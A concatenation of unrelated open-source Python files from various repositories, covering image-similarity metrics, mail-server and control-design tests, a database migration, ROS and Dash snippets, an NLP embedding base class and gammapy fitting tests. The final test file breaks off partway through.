def tf_ssim(img1, img2, cs_map=False, mean_metric=True, size=11, sigma=0.5):
img1 = tf.image.rgb_to_grayscale(img1)
img2 = tf.image.rgb_to_grayscale(img2)
window = _tf_fspecial_gauss(size, sigma,
ch=img1.get_shape().as_list()[-1]) # window shape [size, size]
K1 = 0.01
K2 = 0.03
L = 1 # depth of image (255 in case the image has a differnt scale)
C1 = (K1*L)**2
C2 = (K2*L)**2
mu1 = tf.nn.conv2d(img1, window, strides=[1, 1, 1, 1], padding='VALID')
mu2 = tf.nn.conv2d(img2, window, strides=[1, 1, 1, 1], padding='VALID')
mu1_sq = mu1*mu1
mu2_sq = mu2*mu2
mu1_mu2 = mu1*mu2
sigma1_sq = tf.nn.conv2d(img1*img1, window, strides=[1, 1, 1, 1],
padding='VALID') - mu1_sq
sigma2_sq = tf.nn.conv2d(img2*img2, window, strides=[1, 1, 1, 1],
padding='VALID') - mu2_sq
sigma12 = tf.nn.conv2d(img1*img2, window, strides=[1, 1, 1, 1],
padding='VALID') - mu1_mu2
if cs_map:
value = (
((2*mu1_mu2 + C1) * (2*sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)
), (2.0*sigma12 + C2)/(sigma1_sq + sigma2_sq + C2)
)
else:
value = ((2*mu1_mu2 + C1)*(2*sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))
if mean_metric:
value = tf.reduce_mean(value)
return value
def tf_ms_ssim(img1, img2, mean_metric=True, level=5):
weight = tf.constant([0.0448, 0.2856, 0.3001, 0.2363, 0.1333], dtype=tf.float32)
mssim = []
mcs = []
for l in range(level):
ssim_map, cs_map = tf_ssim(img1, img2, cs_map=True, mean_metric=False)
mssim.append(tf.reduce_mean(ssim_map))
mcs.append(tf.reduce_mean(cs_map))
filtered_im1 = tf.nn.avg_pool(img1, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
filtered_im2 = tf.nn.avg_pool(img2, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
img1 = filtered_im1
img2 = filtered_im2
# list to tensor of dim D+1
mssim = tf.pack(mssim, axis=0)
mcs = tf.pack(mcs, axis=0)
value = (tf.reduce_prod(
mcs[0:level-1]**weight[0:level-1]) * (mssim[level-1]**weight[level-1]))
if mean_metric:
value = tf.reduce_mean(value)
return value
|
test/test_slimta_edge.py | nanojob/python-slimta | 141 | 12688394 | import time
import unittest
from mox3.mox import MoxTestBase
from slimta.edge import Edge, EdgeServer
class TestEdge(MoxTestBase, unittest.TestCase):
def test_handoff(self):
self.mox.StubOutWithMock(time, 'time')
env = self.mox.CreateMockAnything()
queue = self.mox.CreateMockAnything()
time.time().AndReturn(12345)
queue.enqueue(env).AndReturn('asdf')
self.mox.ReplayAll()
edge = Edge(queue, 'test.example.com')
self.assertEqual('asdf', edge.handoff(env))
self.assertEqual('test.example.com', env.receiver)
self.assertEqual(12345, env.timestamp)
def test_handoff_error(self):
env = self.mox.CreateMockAnything()
queue = self.mox.CreateMockAnything()
queue.enqueue(env).AndRaise(RuntimeError)
self.mox.ReplayAll()
edge = Edge(queue)
with self.assertRaises(RuntimeError):
edge.handoff(env)
def test_kill(self):
queue = self.mox.CreateMockAnything()
self.mox.ReplayAll()
edge = Edge(queue)
edge.kill()
class TestEdgeServer(MoxTestBase, unittest.TestCase):
def test_edge_interface(self):
edge = EdgeServer(('127.0.0.1', 0), None)
with self.assertRaises(NotImplementedError):
edge.handle(None, None)
def test_handle(self):
queue = self.mox.CreateMockAnything()
sock = self.mox.CreateMockAnything()
edge = EdgeServer(('127.0.0.1', 0), queue)
self.mox.StubOutWithMock(edge, 'handle')
sock.fileno().AndReturn(15)
edge.handle(sock, 'test address')
self.mox.ReplayAll()
try:
edge.server.pre_start()
except AttributeError:
edge.server.init_socket()
edge._handle(sock, 'test address')
def test_handle_error(self):
queue = self.mox.CreateMockAnything()
sock = self.mox.CreateMockAnything()
edge = EdgeServer(('127.0.0.1', 0), queue)
self.mox.StubOutWithMock(edge, 'handle')
sock.fileno().AndReturn(15)
edge.handle(sock, 5).AndRaise(RuntimeError)
self.mox.ReplayAll()
try:
edge.server.pre_start()
except AttributeError:
edge.server.init_socket()
with self.assertRaises(RuntimeError):
edge._handle(sock, 5)
def test_kill(self):
edge = EdgeServer(('127.0.0.1', 0), None)
self.mox.StubOutWithMock(edge.server, 'stop')
edge.server.stop()
self.mox.ReplayAll()
edge.kill()
def test_run(self):
edge = EdgeServer(('127.0.0.1', 0), None)
self.mox.StubOutWithMock(edge.server, 'start')
self.mox.StubOutWithMock(edge.server, 'serve_forever')
edge.server.start()
edge.server.serve_forever()
self.mox.ReplayAll()
edge._run()
# vim:et:fdm=marker:sts=4:sw=4:ts=4
|
old_stuff/harold/tests/test_static_ctrl_design.py | weightan/quaternion_polynomials | 154 | 12688414 | <gh_stars>100-1000
from numpy import eye, array, sort, empty
from scipy.linalg import block_diag, eigvals
from scipy.signal.filter_design import _cplxpair
from numpy.testing import (assert_almost_equal, assert_array_almost_equal,
assert_array_equal)
from pytest import raises as assert_raises
from harold import lqr, ackermann, State, Transfer, haroldcompanion
from harold._static_ctrl_design import _get_pole_reps
def test_lqr_arguments():
# First arg is not LTI
assert_raises(ValueError, lqr, 1, 1)
# Static Gain
assert_raises(ValueError, lqr, State(1), 1)
# Wrong string
assert_raises(ValueError, lqr, Transfer(1, [1, 1]), 1, weight_on='asdf')
# scalar matrices
H = Transfer(1, [1, 1])
k, x, e = lqr(H, 3)
assert_almost_equal(array([k[0, 0], x[0, 0], e[0]]), [1, 1, -2+0j])
def test_simple_lqr():
# Example taken from <NAME>'s MAE280B lecture notes
H = State([[0, 0, 1, 0],
[0, 0, 0, 1],
[4.03428022844288e-06, 0, 0, 0.0515652322798669],
[0, 0, -0.000104315254033883, 0]],
[[0, 0], [1e-5/3, 0], [0, 0], [0, 0.01]],
eye(4))
k, _, _ = lqr(H[:, 1], eye(4))
H.a = H.a.T
f, _, _ = lqr(H[:, 0], block_diag(0, 0, 1e-5, 1e-5), 0.1)
assert_almost_equal(k, array([[1.00554916, -1, 52.52180106, 18.51107167]]))
assert_almost_equal(f, array([[-577.370350, 173.600463,
0.383744946, 0.050228534]]), decimal=5)
def test_simple_lqry():
# Scalar matrices
H = State(1, 1, 1, 1)
k, x, e = lqr(H, Q=3, weight_on='output')
assert_almost_equal(array([k[0, 0], x[0, 0], e[0]]), [1.5, 3, -0.5+0j])
# Wrong S shape
assert_raises(ValueError, lqr, H, Q=3, S=eye(2), weight_on='output')
def test_simple_dlqr():
# Example taken from <NAME>'s MAE280B lecture notes
H = State([[0, 0, 1, 0],
[0, 0, 0, 1],
[4.03428022844288e-06, 0, 0, 0.0515652322798669],
[0, 0, -0.000104315254033883, 0]],
[[0, 0], [1e-5/3, 0], [0, 0], [0, 0.01]],
eye(4), dt=0.1)
k, _, _ = lqr(H[:, 1], eye(4))
H.a = H.a.T
f, _, _ = lqr(H[:, 0], block_diag(0, 0, 1e-5, 1e-5), 0.1)
assert_almost_equal(k, array([[0, 0, -2.08727337333631e-06, 0]]))
assert_almost_equal(f, array([[1.71884123e-11, 0, 0, -1.79301359e-15]]))
def test_ackermann_args():
# Not SIxO system
G = State(eye(2), eye(2), eye(2))
assert_raises(ValueError, ackermann, G, [1, 2])
# Wrong # of poles
G = State(eye(2), [[1], [0]], [1, 0])
assert_raises(ValueError, ackermann, G, [1, 2, 3])
def test_ackermann_controllable():
#
A = haroldcompanion([1, 6, 5, 1])
B = eye(3)[:, [-1]]
p = [-10, -9, -8]
K = ackermann((A, B), p)
pa = eigvals(A - B@K)
assert_array_almost_equal(array(p, dtype=complex), sort(pa))
def test_ackermann_uncontrollable():
A = block_diag(haroldcompanion([1, 6, 5, 1]), 1)
B = eye(4)[:, [-2]]
p = [-10, -9, -8, -7]
assert_raises(ValueError, ackermann, (A, B), p)
def byersnash_A_B_test_pairs():
ABs = [
# Chemical Reactor (Munro 1979)
(array([[1.38, -0.2077, 6.715, -5.676],
[-0.5814, -4.29, 0, 0.675],
[1.067, 4.273, -6.654, 5.893],
[0.048, 4.273, 1.343, -2.104]]),
array([[0, 0],
[5.679, 0],
[1.136, -3.146],
[1.136, 0]])),
# Distillation Column (<NAME> 1977)
(array([[-0.1094, 0.0628, 0, 0, 0],
[1.306, -2.132, 0.9807, 0, 0],
[0, 1.595, -3.149, 1.547, 0],
[0, 0.0355, 2.632, -4.257, 1.855],
[0, 0.0023, 0, 0.1636, -0.1625]]),
array([[0, 0],
[0.638, 0],
[0.0838, -0.1396],
[0.1004, -0.206],
[0.0063, -0.0128]])),
# Nuclear rocket engine (<NAME> 1974)
(array([[-65.0, 65, -19.5, 19.5],
[0.1, -0.1, 0, 0],
[1, 0, -0.5, -1],
[0, 0, 0.4, 0]]),
array([[65., 0],
[0, 0],
[0, 0],
[0, 0.4]])),
# MIMO system (Atkinson, 1985)
(array([[0, 1, 0],
[0, 0, 1],
[-6, -11, -6]]),
array([[1, 1],
[0, 1],
[1, 1]])),
# Drum boiler (Bengtsson 1973)
(array([[-0.129, 0, 0.396, 0.25, 0.00191],
[0.0329, 0, -0.00779, 0.0122, -0.621],
[0.00718, 0, -0.1, 0.000887, -0.0385],
[0.00411, 0, 0, -0.0822, 0],
[0.00351, 0, 0.0035, 0.00426, -0.0743]]),
array([[0, 0.1390],
[0, 0.0359],
[0, -0.0989],
[0.0249, 0],
[0, -0.00534]])),
# Miminis random example #1
(array([[5.8765, 9.3456, 4.5634, 9.3520],
[6.6526, 0.5867, 3.5829, 0.6534],
[0.0000, 9.6738, 7.4876, 4.7654],
[0.0000, 0.0000, 6.6784, 2.5678]]),
array([[3.9878, 0.5432],
[0.0000, 2.7650],
[0.0000, 0.0000],
[0.0000, 0.0000]])),
# Miminis random example #2
(array([[.5257, .8544, .5596, .5901, .0259, .6213, .7227, .5617],
[.9931, .0643, .1249, .3096, .5174, .3455, .8977, .4682],
[.6489, .8279, .7279, .2552, .3917, .7065, .2428, .7795],
[.9923, .9262, .2678, .6252, .2414, .5211, .4338, .9677],
[.0000, .5667, .5465, .1157, .5064, .2870, .7901, .9809],
[.0000, .0000, .8672, .6117, .4236, .6503, .5069, .8187],
[.0000, .0000, .0000, .0000, .2894, .0881, .5233, .4257],
[.0000, .0000, .0000, .0000, .0000, .4499, .5597, .2462]]),
array([[0.9230, 0.3950, 0.8325],
[0.0000, 0.0366, 0.6105],
[0.0000, 0.0000, 0.1871],
[0.0000, 0.0000, 0.0000],
[0.0000, 0.0000, 0.0000],
[0.0000, 0.0000, 0.0000],
[0.0000, 0.0000, 0.0000],
[0.0000, 0.0000, 0.0000]])),
# Aircraft control example I (Kautsky and Nichols 1983)
(array([[0, 1, 0, 0],
[1.40e-4, -2.04, -1.95, -1.33e-2],
[-2.51e-4, 1, -1.32, -2.38e-2],
[-5.61e-1, 0, 0.358, -2.79e-1]]),
array([[0, 0, 0],
[-5.33, 6.45e-3, -2.67e-1],
[-1.60e-1, -1.16e-2, -2.51e-1],
[0, 1.06e-1, 8.62e-2]])),
# Aircraft control example II (Kautsky and Nichols 1983)
(array([[0, 1, 0, 0],
[5.32e-7, -4.18e-1, -0.12, -2.32e-2],
[-4.62e-9, 1, -0.752, -2.39e-2],
[-5.61e-1, 0, 0.3, -1.74e-2]]),
array([[0, 0],
[-1.72e-1, 7.45e-6],
[-2.82e-2, -7.78e-5],
[0, 3.69e-3]])),
# Symmetric example (Kautsky and Nichols 1983)
(array([[-3.624, 4.9567e-2, -2.4564e-1, 1.3853e-2],
[3.3486e-1, -1.8875, -8.1251e-1, -2.8102e-1],
[-1.9958e-1, -1.1335, -2.2039, -4.5523e-1],
[1.3784e-1, -4.7140e-1, -3.3229e-1, -4.0605]]),
array([[2.3122e-1, 3.0761e-1, 3.6164e-1, 3.3217e-1],
[8.8339e-1, 2.1460e-1, 5.6642e-1, 5.0153e-1]]).T),
# Ad-hoc ill-conditioned example (Byers and Nash 1989)
(array([[0, 0, 0, 0],
[1, 10, 100, 1000],
[0, 1, 10, 100],
[0, 0, 1, 10]]),
array([[1, 0],
[0, 1],
[0, 0],
[0, 0]]))
]
# Return a generator
return (x for x in ABs)
def _test_get_pole_reps():
# Only complex
p = array([1.+1j, 1-1j, 2.+1j, 2-1j])
pr, nc, nr = _get_pole_reps(p)
for x in range(2):
assert_array_equal(pr[x], empty((0, 2)))
assert nc == 4
assert nr == 0
# Only real
p = array([1, 2, 3])
pr, nc, nr = _get_pole_reps(p)
for x in range(2):
assert_array_equal(pr[x], empty((0, 2)))
assert nc == 0
assert nr == 3
# Mixed, no reps
p = array([1.+1j, 1-1j, 3])
pr, nc, nr = _get_pole_reps(p)
for x in range(2):
assert_array_equal(pr[x], empty((0, 2)))
assert nc == 2
assert nr == 1
# Mixed, complex reps
p = array([1.+1j, 1-1j, 1.+1j, 1-1j, 3])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], array([[0, 2]]))
assert_array_equal(pr[1], empty((0, 2)))
assert nc == 4
assert nr == 1
# Mixed real reps
p = array([1.+1j, 1-1j, 1., 1])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], empty((0, 2)))
assert_array_equal(pr[1], array([[2, 4]]))
assert nc == 2
assert nr == 2
# Mixed real reps, real dangling
p = array([1.+1j, 1-1j, 1., 1, 0.54, 3.8])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], empty((0, 2)))
assert_array_equal(pr[1], array([[3, 5]]))
assert nc == 2
assert nr == 4
# Mixed complex reps, complex dangling
p = array([1.+1j, 1-1j, 1.+1j, 1-1j, 0.+1j, 0-1j, 0.5, 3.])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], array([[1, 3]]))
assert_array_equal(pr[1], empty((0, 2)))
assert nc == 6
assert nr == 2
# Mixed reps and dangling
p = array([1.+1j, 1-1j, 1.+1j, 1-1j,
2.+1j, 2-1j,
3.+1j, 3-1j, 3.+1j, 3-1j, 3.+1j, 3-1j,
4.+1j, 4-1j,
0,
0.5, 0.5,
3.,
6, 6, 6])
p = _cplxpair(p).conj()
pr, nc, nr = _get_pole_reps(p)
assert_array_equal(pr[0], array([[0, 2],
[3, 6]]))
assert_array_equal(pr[1], array([[15, 17],
[18, 21]]))
assert nc == 14
assert nr == 7
|
python_modules/dagster/dagster/core/storage/schedules/sqlite/alembic/versions/8ccbed5060b8_0_10_0_create_new_schedule_tables.py | dbatten5/dagster | 4,606 | 12688418 | <reponame>dbatten5/dagster
"""0.10.0 create new schedule tables
Revision ID: 8ccbed5060b8
Revises: <PASSWORD>
Create Date: 2021-01-13 12:56:41.971500
"""
from dagster.core.storage.migration.utils import create_0_10_0_schedule_tables
# revision identifiers, used by Alembic.
revision = "8ccbed5060b8"
down_revision = "<PASSWORD>"
branch_labels = None
depends_on = None
def upgrade():
create_0_10_0_schedule_tables()
def downgrade():
pass
|
pythonturtle/my_turtle.py | Cleverect/PythonTurtle | 114 | 12688438 | <reponame>Cleverect/PythonTurtle
import wx
from .misc.helpers import deg_to_rad, rad_to_deg
from .misc.vector import Vector
# Size of the turtle canvas. We assume no user will have a screen
# so big that the canvas will be bigger than this.
BITMAP_SIZE = Vector((2000, 1200))
# Center of the canvas.
origin = BITMAP_SIZE / 2.0
def to_my_angle(angle):
"""
Transform between the reference frame that we prefer
and the reference frame that wxPython prefers
"""
return rad_to_deg(-angle) - 180
def from_my_angle(angle):
"""
Transform between the reference frame that we prefer
and the reference frame that wxPython prefers
"""
return deg_to_rad(-angle + 180)
def from_my_pos(pos):
"""
Transform between the reference frame that we prefer
and the reference frame that wxPython prefers
"""
return -pos + origin
def to_my_pos(pos):
"""
Transform between the reference frame that we prefer
and the reference frame that wxPython prefers
"""
return -pos + origin
class Turtle:
"""
A Turtle object defines a turtle by its attributes, such as
position, orientation, color, etc. See source of __init__ for
a complete list.
"""
def __init__(self):
self.pos = Vector((0, 0))
self.orientation = 180
self.color = "red"
self.width = 3
self.visible = True
self.pen_down = True
# the `clear` attribute is only made True momentarily when
# the `clear()` function is called by the user to clear the screen.
self.clear = False
self.SPEED = 400.0 # Pixels per second
self.ANGULAR_SPEED = 360.0 # Degrees per second
def give_pen(self):
"""
Gives a wxPython pen that corresponds to the color, width,
and pen_downity of the Turtle instance.
"""
return wx.Pen(self.color,
self.width,
wx.SOLID if self.pen_down else wx.TRANSPARENT)
|
cam_lecture/scripts/edge_filter_compressed.py | yasutomo57jp/ros_lecture | 110 | 12688469 | <gh_stars>100-1000
#!/usr/bin/env python
import rospy
import sys
import cv2
from sensor_msgs.msg import Image, CompressedImage, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
class cvBridgeDemo:
def __init__(self):
self.node_name = "cv_bridge_demo_compressed"
rospy.init_node(self.node_name)
rospy.on_shutdown(self.cleanup)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("input_image", CompressedImage, self.image_callback, queue_size=1)
self.image_pub = rospy.Publisher('output_image', Image, queue_size=1)
def image_callback(self, ros_image_compressed):
try:
np_arr = np.fromstring(ros_image_compressed.data, np.uint8)
input_image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
except CvBridgeError, e:
print e
output_image = self.process_image(input_image)
self.image_pub.publish(self.bridge.cv2_to_imgmsg(output_image, "mono8"))
cv2.imshow(self.node_name, output_image)
cv2.waitKey(1)
def process_image(self, frame):
grey = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
grey = cv2.blur(grey, (7, 7))
edges = cv2.Canny(grey, 15.0, 30.0)
return edges
def cleanup(self):
cv2.destroyAllWindows()
if __name__ == '__main__':
cvBridgeDemo()
rospy.spin() |
examples/schedule/schedule_scripts.py | timgates42/plan | 553 | 12688502 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# Use this file to easily define all of your cron jobs.
#
# It's helpful to understand cron before proceeding.
# http://en.wikipedia.org/wiki/Cron
#
# Learn more: http://github.com/fengsp/plan
from plan import Plan
cron = Plan("scripts", path='/web/yourproject/scripts',
environment={'YOURAPP_ENV': 'production'})
cron.script('script.py', every='1.day')
cron.script('script_2.py', every='1.month', at='hour.12 minute.0')
# more scripts here
if __name__ == "__main__":
cron.run('update')
|
examples/jit/reduction_simple.py | prkhrsrvstv1/cupy | 6,180 | 12688507 | import cupy
from cupyx import jit
@jit.rawkernel()
def reduction(x, y, size):
tid = jit.threadIdx.x
ntid = jit.blockDim.x
value = cupy.float32(0)
for i in range(tid, size, ntid):
value += x[i]
smem = jit.shared_memory(cupy.float32, 1024)
smem[tid] = value
jit.syncthreads()
if tid == cupy.uint32(0):
value = cupy.float32(0)
for i in range(ntid):
value += smem[i]
y[0] = value
size = cupy.uint32(2 ** 22)
x = cupy.random.normal(size=(size,), dtype=cupy.float32)
y = cupy.empty((1,), dtype=cupy.float32)
reduction[1, 1024](x, y, size)
print(y[0])
print(x.sum())
|
dash-static-image-serve.py | oriolmirosa/dash-recipes | 932 | 12688509 | <reponame>oriolmirosa/dash-recipes
import dash
import dash_html_components as html
import os
import config
STATIC_PREFIX = '/{}/static/'.format(config.DASH_APP_NAME)
app = dash.Dash()
app.layout = html.Div([
html.Img(src='{}my-image.png'.format(STATIC_PREFIX))
])
# Static routes for on-premise are a little bit different than local
# because the Plotly On-Premise proxy server strips away the app name
# before forwarding the request to Dash
if 'DYNO' in os.environ:
static_route = '/static/<path:path>'
else:
static_route = '/{}/static/<path:path>'.format(config.DASH_APP_NAME)
@server.route(static_route)
def serve_static(path):
root_dir = os.getcwd()
return flask.send_from_directory(
os.path.join(root_dir, 'static'), path
)
|
kashgari/embeddings/abc_embedding.py | SharpKoi/Kashgari | 2,422 | 12688537 | # encoding: utf-8
# author: BrikerMan
# contact: <EMAIL>
# blog: https://eliyar.biz
# file: abc_embedding.py
# time: 2:43 下午
import json
from typing import Dict, List, Any, Optional, Union
import numpy as np
import tensorflow as tf
import tqdm
import kashgari
from kashgari.generators import CorpusGenerator
from kashgari.logger import logger
from kashgari.processors import ABCProcessor
L = tf.keras.layers
class ABCEmbedding:
def to_dict(self) -> Dict[str, Any]:
config: Dict[str, Any] = {
'segment': self.segment,
'embedding_size': self.embedding_size,
'max_position': self.max_position,
**self.kwargs
}
return {
'__class_name__': self.__class__.__name__,
'__module__': self.__class__.__module__,
'config': config,
'embed_model': json.loads(self.embed_model.to_json())
}
def __init__(self,
segment: bool = False,
embedding_size: int = 100,
max_position: int = None,
**kwargs: Any):
self.embed_model: tf.keras.Model = None
self.segment: bool = segment # type: ignore
self.kwargs = kwargs
self.embedding_size: int = embedding_size # type: ignore
self.max_position: int = max_position # type: ignore
self.vocab2idx = self.load_embed_vocab()
self._text_processor: Optional[ABCProcessor] = None
def _override_load_model(self, config: Dict) -> None:
embed_model_json_str = json.dumps(config['embed_model'])
self.embed_model = tf.keras.models.model_from_json(embed_model_json_str,
custom_objects=kashgari.custom_objects)
def setup_text_processor(self, processor: ABCProcessor) -> None:
self._text_processor = processor
self.build_embedding_model(vocab_size=processor.vocab_size)
self._text_processor.segment = self.segment
if self.vocab2idx:
self._text_processor.vocab2idx = self.vocab2idx
self._text_processor.idx2vocab = dict([(v, k) for k, v in self.vocab2idx.items()])
def get_seq_length_from_corpus(self,
generators: List[CorpusGenerator],
*,
use_label: bool = False,
cover_rate: float = 0.95) -> int:
"""
Calculate proper sequence length according to the corpus
Args:
generators:
use_label:
cover_rate:
Returns:
"""
seq_lens = []
for gen in generators:
for sentence, label in tqdm.tqdm(gen, desc="Calculating sequence length"):
if use_label:
seq_lens.append(len(label))
else:
seq_lens.append(len(sentence))
if cover_rate == 1.0:
target_index = -1
else:
target_index = int(cover_rate * len(seq_lens))
sequence_length = sorted(seq_lens)[target_index]
logger.debug(f'Calculated sequence length = {sequence_length}')
return sequence_length
def load_embed_vocab(self) -> Optional[Dict[str, int]]:
"""
Load vocab dict from embedding layer
Returns:
vocab dict or None
"""
raise NotImplementedError
def build_embedding_model(self,
*,
vocab_size: int = None,
force: bool = False,
**kwargs: Dict) -> None:
raise NotImplementedError
def embed(self,
sentences: List[List[str]],
*,
debug: bool = False) -> np.ndarray:
"""
batch embed sentences
Args:
sentences: Sentence list to embed
debug: show debug info
Returns:
vectorized sentence list
"""
if self._text_processor is None:
raise ValueError('Need to setup the `embedding.setup_text_processor` before calling the embed function.')
tensor_x = self._text_processor.transform(sentences,
segment=self.segment,
seq_length=self.max_position)
if debug:
logger.debug(f'sentence tensor: {tensor_x}')
embed_results = self.embed_model.predict(tensor_x)
return embed_results
if __name__ == "__main__":
pass
|
tensorflow/python/framework/kernels.py | abhaikollara/tensorflow | 848 | 12688545 | <filename>tensorflow/python/framework/kernels.py
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for querying registered kernels."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.framework import kernel_def_pb2
from tensorflow.python import pywrap_tensorflow as c_api
from tensorflow.python.util import compat
def get_all_registered_kernels():
"""Returns a KernelList proto of all registered kernels.
"""
buf = c_api.TF_GetAllRegisteredKernels()
data = c_api.TF_GetBuffer(buf)
kernel_list = kernel_def_pb2.KernelList()
kernel_list.ParseFromString(compat.as_bytes(data))
return kernel_list
def get_registered_kernels_for_op(name):
"""Returns a KernelList proto of registered kernels for a given op.
Args:
name: A string representing the name of the op whose kernels to retrieve.
"""
buf = c_api.TF_GetRegisteredKernelsForOp(name)
data = c_api.TF_GetBuffer(buf)
kernel_list = kernel_def_pb2.KernelList()
kernel_list.ParseFromString(compat.as_bytes(data))
return kernel_list
|
gammapy/modeling/tests/test_fit.py | ischigal/gammapy | 155 | 12688567 | <reponame>ischigal/gammapy
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Unit tests for the Fit class"""
import pytest
from numpy.testing import assert_allclose
from astropy.table import Table
from gammapy.datasets import Dataset
from gammapy.modeling import Fit, Parameter
from gammapy.modeling.models import Model, Models
from gammapy.utils.testing import requires_dependency
pytest.importorskip("iminuit")
class MyModel(Model):
x = Parameter("x", 2)
y = Parameter("y", 3e2)
z = Parameter("z", 4e-2)
name = "test"
datasets_names = ["test"]
type = "model"
class MyDataset(Dataset):
tag = "MyDataset"
def __init__(self, name="test"):
self._name = name
self._models = Models([MyModel(x=1.99, y=2.99e3, z=3.99e-2)])
self.data_shape = (1,)
self.meta_table = Table()
@property
def models(self):
return self._models
def stat_sum(self):
# self._model.parameters = parameters
x, y, z = [p.value for p in self.models.parameters]
x_opt, y_opt, z_opt = 2, 3e2, 4e-2
return (x - x_opt) ** 2 + (y - y_opt) ** 2 + (z - z_opt) ** 2
def fcn(self):
x, y, z = [p.value for p in self.models.parameters]
x_opt, y_opt, z_opt = 2, 3e5, 4e-5
x_err, y_err, z_err = 0.2, 3e4, 4e-6
return (
((x - x_opt) / x_err) ** 2
+ ((y - y_opt) / y_err) ** 2
+ ((z - z_opt) / z_err) ** 2
)
def stat_array(self):
"""Statistic array, one value per data point."""
@requires_dependency("iminuit")
@requires_dependency("sherpa")
@pytest.mark.parametrize("backend", ["sherpa", "scipy"])
def test_optimize_backend_and_covariance(backend):
dataset = MyDataset()
if backend == "scipy":
kwargs = {"method": "L-BFGS-B"}
else:
kwargs = {}
kwargs["backend"] = backend
fit = Fit(optimize_opts=kwargs)
result = fit.run([dataset])
result = result["optimize_result"]
pars = result.parameters
assert_allclose(pars["x"].value, 2, rtol=1e-3)
assert_allclose(pars["y"].value, 3e2, rtol=1e-3)
assert_allclose(pars["z"].value, 4e-2, rtol=1e-2)
assert_allclose(pars["x"].error, 1, rtol=1e-7)
assert_allclose(pars["y"].error, 1, rtol=1e-7)
assert_allclose(pars["z"].error, 1, rtol=1e-7)
correlation = dataset.models.covariance.correlation
assert_allclose(correlation[0, 1], 0, atol=1e-7)
assert_allclose(correlation[0, 2], 0, atol=1e-7)
assert_allclose(correlation[1, 2], 0, atol=1e-7)
@pytest.mark.parametrize("backend", ["minuit"])
def test_run(backend):
dataset = MyDataset()
fit = Fit(backend=backend)
result = fit.run([dataset])
result = result["optimize_result"]
pars = result.parameters
assert result.success is True
assert_allclose(pars["x"].value, 2, rtol=1e-3)
assert_allclose(pars["y"].value, 3e2, rtol=1e-3)
assert_allclose(pars["z"].value, 4e-2, rtol=1e-3)
assert_allclose(pars["x"].error, 1, rtol=1e-7)
assert_allclose(pars["y"].error, 1, rtol=1e-7)
assert_allclose(pars["z"].error, 1, rtol=1e-7)
correlation = dataset.models.covariance.correlation
assert_allclose(correlation[0, 1], 0, atol=1e-7)
assert_allclose(correlation[0, 2], 0, atol=1e-7)
assert_allclose(correlation[1, 2], 0, atol=1e-7)
@requires_dependency("sherpa")
@pytest.mark.parametrize("backend", ["minuit", "sherpa", "scipy"])
def test_optimize(backend):
dataset = MyDataset()
if backend == "scipy":
kwargs = {"method": "L-BFGS-B"}
else:
kwargs = {}
fit = Fit(store_trace=True, backend=backend, optimize_opts=kwargs)
result = fit.optimize([dataset])
pars = dataset.models.parameters
assert result.success is True
assert_allclose(result.total_stat, 0, atol=1)
assert_allclose(pars["x"].value, 2, rtol=1e-3)
assert_allclose(pars["y"].value, 3e2, rtol=1e-3)
assert_allclose(pars["z"].value, 4e-2, rtol=1e-2)
assert len(result.trace) == result.nfev
# TODO: add some extra covariance tests, in addition to run
# Probably mainly if error message is OK if optimize didn't run first.
# def test_covariance():
@pytest.mark.parametrize("backend", ["minuit"])
def test_confidence(backend):
dataset = MyDataset()
fit = Fit(backend=backend)
fit.optimize([dataset])
result = fit.confidence(datasets=[dataset], parameter="x")
assert result["success"] is True
assert_allclose(result["errp"], 1)
assert_allclose(result["errn"], 1)
# Check that original value state wasn't changed
assert_allclose(dataset.models.parameters["x"].value, 2)
@pytest.mark.parametrize("backend", ["minuit"])
def test_confidence_frozen(backend):
dataset = MyDataset()
dataset.models.parameters["x"].frozen = True
fit = Fit(backend=backend)
fit.optimize([dataset])
result = fit.confidence(datasets=[dataset], parameter="y")
assert result["success"] is True
assert_allclose(result["errp"], 1)
assert_allclose(result["errn"], 1)
def test_stat_profile():
dataset = MyDataset()
fit = Fit()
fit.run([dataset])
dataset.models.parameters["x"].scan_n_values = 3
result = fit.stat_profile(datasets=[dataset], parameter="x")
assert_allclose(result["x_scan"], [0, 2, 4], atol=1e-7)
assert_allclose(result["stat_scan"], [4, 0, 4], atol=1e-7)
assert len(result["fit_results"]) == 0
# Check that original value state wasn't changed
assert_allclose(dataset.models.parameters["x"].value, 2)
def test_stat_profile_reoptimize():
dataset = MyDataset()
fit = Fit()
fit.run([dataset])
dataset.models.parameters["y"].value = 0
dataset.models.parameters["x"].scan_n_values = 3
result = fit.stat_profile(datasets=[dataset], parameter="x", reoptimize=True)
assert_allclose(result["x_scan"], [0, 2, 4], atol=1e-7)
assert_allclose(result["stat_scan"], [4, 0, 4], atol=1e-7)
assert_allclose(
result["fit_results"][0].total_stat, result["stat_scan"][0], atol=1e-7
)
def test_stat_surface():
dataset = MyDataset()
fit = Fit()
fit.run([dataset])
x_values = [1, 2, 3]
y_values = [2e2, 3e2, 4e2]
dataset.models.parameters["x"].scan_values = x_values
dataset.models.parameters["y"].scan_values = y_values
